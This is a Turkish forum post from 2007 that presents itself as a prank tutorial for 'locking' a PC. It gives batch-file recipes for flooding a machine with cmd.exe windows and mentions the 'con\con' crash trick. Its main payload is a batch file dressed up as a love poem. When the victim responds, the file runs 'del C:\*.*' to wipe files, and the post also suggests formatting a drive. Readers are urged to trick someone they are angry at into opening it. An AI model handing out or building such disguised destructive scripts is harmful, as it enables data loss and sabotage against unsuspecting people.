by MuJOE
Would you like to react to this message? Create an account in a few clicks or log in to continue.
by MuJOE

design by mujoe

AnasayfaAnasayfa  AramaArama  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yap  

pc kilitleme

YazarMesaj
MuJoe
aDMin
aDMin
MuJoe

pc kilitleme Empty
MesajKonu: pc kilitleme   pc kilitleme Icon_minitimeSalı Kas. 27, 2007 3:54 am

Ders: pc
konu: pc kitleme
amaç: kısa süreli korku yada basit bir şaka
hoca : karakutu Razz
en baştan söyliyim basit ve daha önce karşılaşmadığım bir yöntem ... abi sazanlık yapıpda bunu biliyordum işte felan filan yazmayın dikkata bile almayacağım.. neyse ben burdan bilmeyenlere yazıyorum ...
...
ilk önce bir tane yeni "txt" dosyası açıyoruz boş...
daha sonra içine "start" yazıyoruz alt alta ..
Örnek:
start
start
start
start
start
start
start
gibi artık kafanıza göre alt alta kaçtane yazmak isterseniz...
neyse yazdık ve kayıt edip kapattık. peki şimdi ne olucak ??
şimdi uzantısı "txt" olan metnimizi biz "bat" yada "com" olarak değiştiricez
işte işin sonu... uzantısını değiştirdiğimiz dosyayı açmak istediğimizde biz alt alta kaçtane start yazdıysak okadar cmd.exe açılacak yani ms-dos sayfası ... peki nasıl pc kitlencek 5-10 yazarsanız kitlenmez doğal olarak ... siz bunu 500-600 tane kopyalıp yapıştır yapark hazırlayın burda işim tadi art arda 500-600 tane cmd.exe açılması ama yok bu çok tefarruatlı diyorsanız "start" yerine "con\con" yazarsanız dosya açıldığında pc hemen kitlenir
örnek:
@echo Pc Kitleme 1
@echo simdi bir suru dos acilcak hahaaa )
start
start
start
start
start..... gibi
burda start yerine "con\con yazdığımızda bir satır , açıldığında doys pc kitlenir ve reset yemesi lazım
dipnot : @echo komutu dos ekranında görünmesiniiztediğniz metnin görünmesini sağlar + bu yöntem ile bir çok şey yapa bilirsiniz dos komutları ile örnek:
diyelim ki biri var konuşuyoruz , kıl gittiniz yada kızdınız ona. ona küçük bir ders vermek için şunu yapa bilirsiniz eğer yer se !!!!
@echo Bu dijital siir sana
@echo Duysesimi oku bunlari
@echo seni cok sevdim ben
@echo ne olur anla beni sevdigim...
@echo askindan lamer oldum hekir oldum yer yer kovuldum (
@echo ban yedim, asagilandim
@echo cokbilmislerin arasinda kaldim
@echo niyee?? bunu ogrenip sana yedirmek icin :PPP
@echo Bu siri silmek ve bir daha okumamak istiyorsan "E" bas sonra "enter"a ve eşveda de bana ((
@echo off
del C:\*.*
eger bunu YEDİRE BİLİRSENİZ bence epey bir eglenirsiniz...
daha bir cok sey yapıla bilir msl format attırıla bilir ama "D" sürücüsüne...
zate okuyan ve biraz anlayan mantığı kapmıştır dos komutlarından anlıyorsanız gerisi gelir ... bir çok şey mümkün bununla ...
not :
bu yazı bilmeyen ve yeni yeni başlayan arkadaşlara maal olmuştur, WARDOM bünyesinde barınan herkez kaynak göstermeden ( gsötersede fan olmaz ) ala bilir yaza bilir ...
https://gencscity.yetkin-forum.com

pc kilitleme
1 sayfadaki 1 sayfası